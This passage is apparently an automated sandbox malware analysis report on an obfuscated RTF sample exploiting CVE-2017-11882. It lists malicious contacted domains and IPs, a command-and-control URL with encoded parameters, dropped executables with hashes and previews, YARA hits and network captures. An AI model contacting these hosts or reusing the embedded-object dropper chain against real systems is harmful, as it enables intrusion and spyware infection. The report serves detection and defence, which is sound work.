            		truefalse
              		high
              www.magadirect.co.uk
              		45.33.18.44
              		truetrue
                		unknown
                www.luanaterra.online
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.sqlite.org/2014/sqlite-dll-win32-x86-3080700.zipfalse
                    		high
                    www.bookmarkfiles.info/aekc/true
                    • Avira URL Cloud: safe
                    		low
                    http://www.magadirect.co.uk/aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DMtrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.windows.com/pctv.explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                      		high
                      http://investor.msn.comexplorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                        		high
                        http://www.msnbc.com/news/ticker.txtexplorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                          		high
                          http://wellformedweb.org/CommentAPI/explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.iis.fhg.de/audioPAexplorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.piriform.com/ccleanerqexplorer.exe, 0000000A.00000000.1029291046.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.986329833.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.958357895.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1004626983.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            http://www.piriform.com/ccleaner1SPS0explorer.exe, 0000000A.00000000.978377131.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1010833057.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.993943393.0000000008611000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.hotmail.com/oeexplorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                		high
                                http://treyresearch.netexplorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                                  		high
                                  http://java.sun.comexplorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.icra.org/vocabulary/.explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 0000000A.00000000.1001877731.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                    		high
                                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000A.00000000.1010360758.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995439916.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979257547.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.950353171.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.994846785.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979787030.000000000880D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.992888492.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011293822.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.993114505.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1010156944.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.976835880.00000000084D2000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      http://investor.msn.com/explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        http://www.piriform.com/ccleanerexplorer.exe, 0000000A.00000000.976786692.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1004626983.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          http://computername/printers/printername/.printerexplorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.%s.comPAexplorer.exe, 0000000A.00000000.1001877731.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		low
                                          http://www.autoitscript.com/autoit3explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://support.mozilla.orgexplorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.piriform.com/ccleanervexplorer.exe, 0000000A.00000000.988586812.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1006236115.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.968187098.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameClient.exe, 00000005.00000002.947458698.0000000002671000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://servername/isapibackend.dllexplorer.exe, 0000000A.00000000.1008328661.0000000006450000.00000002.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  45.33.6.223
                                                  		www.sqlite.orgUnited States
                                                  		63949LINODE-APLinodeLLCUSfalse
                                                  45.33.18.44
                                                  		www.magadirect.co.ukUnited States
                                                  		63949LINODE-APLinodeLLCUStrue

                                                  General Information

                                                  Joe Sandbox Version:35.0.0 Citrine
                                                  Analysis ID:680332
                                                  Start date and time: 08/08/202212:06:102022-08-08 12:06:10 +02:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 9m 2s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.1520 (renamed file extension from 1520 to rtf)
                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                  Number of analysed new started processes analysed:14
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.expl.evad.winRTF@11/9@4/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 22.2% (good quality ratio 20.9%)
                                                  • Quality average: 69.8%
                                                  • Quality standard deviation: 30%
                                                  HCA Information:
                                                  • Successful, ratio: 79%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                  • Attach to Office via COM
                                                  • Scroll down
                                                  • Close Viewer

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  12:07:15API Interceptor38x Sleep call for process: EQNEDT32.EXE modified
                                                  12:07:17API Interceptor176x Sleep call for process: Client.exe modified
                                                  12:07:39API Interceptor6x Sleep call for process: notepad.exe modified
                                                  12:08:23API Interceptor356x Sleep call for process: NAPSTAT.EXE modified
                                                  12:09:04API Interceptor1x Sleep call for process: explorer.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASNs

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):962560
                                                  Entropy (8bit):7.212114876878578
                                                  Encrypted:false
                                                  SSDEEP:12288:rH/hLzLfhhDL1RJj2Y77Jk0dMjLA3PFqO8vUMFsPwBjA32fBE:b/N5hDLr5dk02j8FkvHBjAYE
                                                  MD5:426E7D731C2BA1BD9534EB8F737CDEAF
                                                  SHA1:C6DDBF5EC6281C716B47BE2F043B2E6ACDEF3CF4
                                                  SHA-256:A59D7D77C0A6B59BEA96AD8E4D32B42AD1EC4DEEC31590940CC0A373978C2E2D
                                                  SHA-512:165520C163AAFCFECD5DF204D2CD2805B0D180C0864A666365AF06DB470398C9D29B1C035DFA217B22630E930420697562830989F67EBB0C6F1B2DA0E2A8B5F8
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, Author: John Davison
                                                  • Rule: EXP_potential_CVE_2017_11882, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, Author: ReversingLabs
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Reputation:low
                                                  Preview:......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R...Q........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{17E34B3C-ECE7-4F93-91C3-612FE851B900}.tmp

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):1.1722028273607172
                                                  Encrypted:false
                                                  SSDEEP:6:beKNc1ElClXiKNgREqAWlgFJYm7KmrRmvlw5Fr+ur8FrK:beOc1MClXiOk5uFJd5Rmvq5ZP8ZK
                                                  MD5:75FCAEF5B6C0ADE6AF66F49874853C6A
                                                  SHA1:834FA72EEF104773D7052895798FED035EF01594
                                                  SHA-256:01E456476480AA1FD27ACF8F02AEA30D9B09581579A029154A6CD2A6850C85A0
                                                  SHA-512:5E7DBBEB9534660466B7ACD9E70725504C33CC435C08D30ECE035B7CC13F5DC8AAB73F8CA16AA562697063059FEC3C5EE8258F108EB68C8B1071DD381FEDB99A
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:..).(.).(.).(.).(.).(.).5.=....... .P.a.c.k.a.g.e.E.M.B.E.D.5.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D..........................................................................................................................................................................................................................................................................................................................................................................................................................................."...<...>...@...F............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J.....j....CJ..OJ..QJ..U..^J...<..CJ..OJ..QJ..^J...OJ..QJ..^J.

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB22E69-27EE-49FB-B577-3348055FCC0D}.tmp

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.05390218305374581
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lYdn:4Wn
                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Client.exe

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):948736
                                                  Entropy (8bit):7.246077385861013
                                                  Encrypted:false
                                                  SSDEEP:12288:mH/hLzLfhhDL1RJj2Y77Jk0dMjLA3PFqO8vUMFsPwBjA32fBE:A/N5hDLr5dk02j8FkvHBjAYE
                                                  MD5:D94161753531177B2FB80365ADDCBFA8
                                                  SHA1:560C1FB1BF46B5144896570B228C7189B187ED7F
                                                  SHA-256:A5FC090CA6391A09E1DD85FF29F9D3F25300829DE6C74426EA0C142A56EABC1D
                                                  SHA-512:957DCD9145153D77D26FA9066ADAAD1336977144AC02A1E9E00971A2AE2A07820B787AF0237A1B97567F6935CF4C5B51F79D863879D9A179AFC0FFD18BEEE1E1
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 22%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.b.........."...0..>...8...........`... ....@.. ....................................@.....................................W....................................................................................................`..H...........b..dzG4e.,... ......................@....text....;...`...<...2.............. ..`.rsrc................n..............@..@.....................v.............. ..`.reloc...............x..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Client.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:gAWY3n:qY3n
                                                  MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                  SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                  SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                  SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]..ZoneId=3..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.LNK

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 8 18:07:02 2022, mtime=Mon Aug 8 18:07:02 2022, atime=Mon Aug 8 18:07:12 2022, length=2883613, window=hide
                                                  Category:dropped
                                                  Size (bytes):1204
                                                  Entropy (8bit):4.569449910987798
                                                  Encrypted:false
                                                  SSDEEP:24:8/N4ylhn/XTRKJkJHCn9Dze4HCn9DmDv3q6u7D:8fhn/XT04HCn1lHCnz60D
                                                  MD5:70A36B224D1C572B995BD556EF759DB3
                                                  SHA1:0CA78EEFCB96BD578DC302DAD8D06C6B13886761
                                                  SHA-256:05A6062747A4BB44506A265B36A2C5CD6FE3337B57B8D141994725F8345620C8
                                                  SHA-512:39C2C4AEDC51017041F05D32BF9FB227C60604C4604EAF30BDCE7B7EBE838B326D8FBD1E3352BF24219C420605D0A77A8AC722AB62B3B950A3744E11BD226984
                                                  Malicious:false
                                                  Preview:L..................F.... .......Z.......Z....6..Z.....,..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1......U...Desktop.d......QK.X.U.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2...,..U. .SECURI~1.RTF..........U..U.*.........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.t.f...O.b.f.u.s.c.a.t.e.d...3.2...1.2.3.9.5...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\048707\Users.user\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf.K.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...R.t.f...O.b.f.u.s.c.a.t.e.d...3.2...1.2.3.9.5...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............

                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):148
                                                  Entropy (8bit):4.980743826841669
                                                  Encrypted:false
                                                  SSDEEP:3:bDuMJluscbcTLqjQWC0LULeBCmxW9rbcTLqjQWC0LULeBCv:bCVwTeS0LCeBgrwTeS0LCeBs
                                                  MD5:F5B5C7A44D064A168B55B6546BEB143F
                                                  SHA1:DF650FE24365C0DF6B059F048104A0E458C87E56
                                                  SHA-256:A102AB1C9E3EE964697863D84AEADD8D4D36BA057DF75DC66AB8CED753A20090
                                                  SHA-512:9AAACF55B9357FC3E282C44D6E5E9514AEC3D7FCFC8FE60F0CE01A9EA92CA9729081CFC7896C411686D2E0C03729B5D72CA22F1D645634440A41145B6434E762
                                                  Malicious:false
                                                  Preview:[folders]..Templates.LNK=0..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.LNK=0..[misc]..SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.LNK=0..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.503835550707525
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                                                  MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                                                  SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                                                  SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                                                  SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                                                  Malicious:false
                                                  Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

                                                  C:\Users\user\Desktop\~$curiteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.503835550707525
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                                                  MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                                                  SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                                                  SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                                                  SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                                                  Malicious:false
                                                  Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

                                                  Static File Info

                                                  General

                                                  File type:Rich Text Format data, version 1, unknown character set
                                                  Entropy (8bit):4.78563050775552
                                                  TrID:
                                                  • Rich Text Format (5005/1) 55.56%
                                                  • Rich Text Format (4004/1) 44.44%
                                                  File name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf
                                                  File size:2883613
                                                  MD5:26111b2647fc8b1e3e123e825f716b94
                                                  SHA1:131907f569a2774c1800430ccf052896dc685ec0
                                                  SHA256:7d4a1c05f377343f063e0b265fc85f928b59f0cd88914f2b2715c4a25c734838
                                                  SHA512:44c6bdb04ac725f0d73f53e4b770502033171213e0194899e781df10f9e2d3e80d50985f1c0500feda91f76948c1f04fa3a6713aab36d76c135b7df736ef23d3
                                                  SSDEEP:24576:tSRlUCdvKN2W0fKMjy7qXpGjbqi1VzEjCpqdf9bSrdMymS1W:c
                                                  TLSH:99D5A570B1B535C6E26F0172429FBC59521738C7B3C62D88811DEAF62ED4B7A7B41A0E
                                                  File Content Preview:{\rtf1{\*\pnseclvl3\pndec\pnstart1\pnindent720\pnhang {\pntxta .}}{\*\pnseclvl4\pnlcltr\pnstart1\pnindent720\pnhang {\pntxta )}}{\*\pnseclvl5\pndec\pnstart1\pnindent720\pnhang {\pntxtb (}{\pntxta )}}{\*\pnseclvl6.\pnlcltr\pnstart1\pnindent720\pnhang {\pnt

                                                  File Icon

                                                  Icon Hash:e4eea2aaa4b4b4a4

                                                  Static RTF Info

                                                  Objects

                                                  IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                  00000128Dh2embeddedPackage948903Client.exeC:\Path\Client.exeC:\Path\Client.exeno
                                                  1001DF7BDh2embeddedEquation.33072no

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Aug 8, 2022 12:08:49.397722006 CEST4917180192.168.2.2245.33.18.44
                                                  Aug 8, 2022 12:08:49.539129972 CEST804917145.33.18.44192.168.2.22
                                                  Aug 8, 2022 12:08:49.539345026 CEST4917180192.168.2.2245.33.18.44
                                                  Aug 8, 2022 12:08:49.539773941 CEST4917180192.168.2.2245.33.18.44
                                                  Aug 8, 2022 12:08:49.683424950 CEST804917145.33.18.44192.168.2.22
                                                  Aug 8, 2022 12:08:49.683451891 CEST804917145.33.18.44192.168.2.22
                                                  Aug 8, 2022 12:08:49.683665991 CEST4917180192.168.2.2245.33.18.44
                                                  Aug 8, 2022 12:08:49.683860064 CEST4917180192.168.2.2245.33.18.44
                                                  Aug 8, 2022 12:08:49.827022076 CEST804917145.33.18.44192.168.2.22
                                                  Aug 8, 2022 12:09:09.413953066 CEST4917280192.168.2.2245.33.6.223
                                                  Aug 8, 2022 12:09:09.555061102 CEST804917245.33.6.223192.168.2.22
                                                  Aug 8, 2022 12:09:09.555181980 CEST4917280192.168.2.2245.33.6.223
                                                  Aug 8, 2022 12:09:09.556029081 CEST4917280192.168.2.2245.33.6.223
                                                  Aug 8, 2022 12:09:09.697192907 CEST804917245.33.6.223192.168.2.22
                                                  Aug 8, 2022 12:09:09.698842049 CEST804917245.33.6.223192.168.2.22
                                                  Aug 8, 2022 12:09:09.698944092 CEST804917245.33.6.223192.168.2.22
                                                  Aug 8, 2022 12:09:09.698975086 CEST4917280192.168.2.2245.33.6.223
                                                  Aug 8, 2022 12:09:09.699006081 CEST4917280192.168.2.2245.33.6.223
                                                  Aug 8, 2022 12:09:09.721349955 CEST4917280192.168.2.2245.33.6.223
                                                  Aug 8, 2022 12:09:09.862656116 CEST804917245.33.6.223192.168.2.22

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Aug 8, 2022 12:08:49.188456059 CEST5586853192.168.2.228.8.8.8
                                                  Aug 8, 2022 12:08:49.348788977 CEST53558688.8.8.8192.168.2.22
                                                  Aug 8, 2022 12:09:09.352061987 CEST4968853192.168.2.228.8.8.8
                                                  Aug 8, 2022 12:09:09.386590958 CEST53496888.8.8.8192.168.2.22
                                                  Aug 8, 2022 12:09:09.732258081 CEST5883653192.168.2.228.8.8.8
                                                  Aug 8, 2022 12:09:09.754498959 CEST53588368.8.8.8192.168.2.22
                                                  Aug 8, 2022 12:09:14.764194012 CEST5013453192.168.2.228.8.8.8
                                                  Aug 8, 2022 12:09:14.786825895 CEST53501348.8.8.8192.168.2.22

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Aug 8, 2022 12:08:49.188456059 CEST192.168.2.228.8.8.80xceeeStandard query (0)www.magadirect.co.ukA (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:09:09.352061987 CEST192.168.2.228.8.8.80xca44Standard query (0)www.sqlite.orgA (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:09:09.732258081 CEST192.168.2.228.8.8.80xc4a9Standard query (0)www.luanaterra.onlineA (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:09:14.764194012 CEST192.168.2.228.8.8.80xca6dStandard query (0)www.hogogala.comA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk45.33.18.44A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk72.14.185.43A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk45.33.30.197A (IP address)IN (0x0001)
                                                  Aug 8, 2022 12:08:49.348788977 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.magadirect.co.uk45.33.20.235A (IP address)IN (0x0001)
